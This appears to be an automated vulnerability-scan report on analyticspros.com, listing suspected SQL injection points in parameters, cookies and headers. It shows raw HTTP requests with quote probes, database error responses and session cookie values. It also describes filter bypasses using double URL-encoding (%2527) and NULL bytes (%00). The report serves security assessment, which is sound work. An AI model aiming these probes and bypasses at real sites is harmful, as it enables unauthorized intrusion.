GET /blog/googleanalytics/95-more-dimensions-site-search-source-medium.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=10 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11'; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:04:01 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/googleanalytics/95-more-dimensions-site-search-source-medium.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=10 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11''; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:04:04 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:04:07 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 06:04:07 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22846
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
1.127. http://www.analyticspros.com/blog/googleanalytics/95-more-dimensions-site-search-source-medium.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /blog/googleanalytics/95-more-dimensions-site-search-source-medium.html?1'=1 HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=10 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:15:28 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/googleanalytics/95-more-dimensions-site-search-source-medium.html?1''=1 HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=10 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:15:29 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:15:30 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 06:15:30 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22865
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /blog'/googleanalytics/97-workshop-january-29th-dimensionator.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog/googleanalytics.html?type=atom&start=10 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 404 Component not found Date: Sat, 06 Nov 2010 06:24:14 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Sat, 06 Nov 2010 06:24:17 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 3015
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir=" ...[SNIP]... <title>404 - Error: 404</title> ...[SNIP]...
Request 2
GET /blog''/googleanalytics/97-workshop-january-29th-dimensionator.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog/googleanalytics.html?type=atom&start=10 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:24:17 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Length: 326 Connection: close Content-Type: text/html
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /blog/googleanalytics/97-workshop-january-29th-dimensionator.html' HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=10 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 404 Not Found Date: Sat, 06 Nov 2010 01:59:12 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/googleanalytics/97-workshop-january-29th-dimensionator.html'' HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=10 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 404 Not Found Date: Sat, 06 Nov 2010 01:59:13 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 01:59:14 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 01:59:14 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 21528
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The apros2.0_tpl cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the apros2.0_tpl cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /blog/seo.feed HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog/seo.feed?type=atom Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0'; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:26:50 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/seo.feed HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog/seo.feed?type=atom Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0''; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:26:51 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:26:55 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 07:26:55 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 21579
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The fpssCookie cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the fpssCookie cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /blog/seo.feed?type=rss HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog/seo.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true'; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:22:56 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/seo.feed?type=rss HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog/seo.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true''; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:22:58 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:22:59 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 07:22:59 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 21580
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The type parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the type parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the type request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /blog/seo.feed?type=rss%2527 HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog/seo.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:20:35 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/seo.feed?type=rss%2527%2527 HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog/seo.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:20:36 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:20:39 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 07:20:39 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 21594
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /blog/seo.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)%2527 Connection: close Referer: http://www.analyticspros.com/consulting.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:44:52 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/seo.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)%2527%2527 Connection: close Referer: http://www.analyticspros.com/consulting.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:44:53 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /blog/seo/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; Referer: http://www.google.com/search?hl=en&q=%00'
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:25:55 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
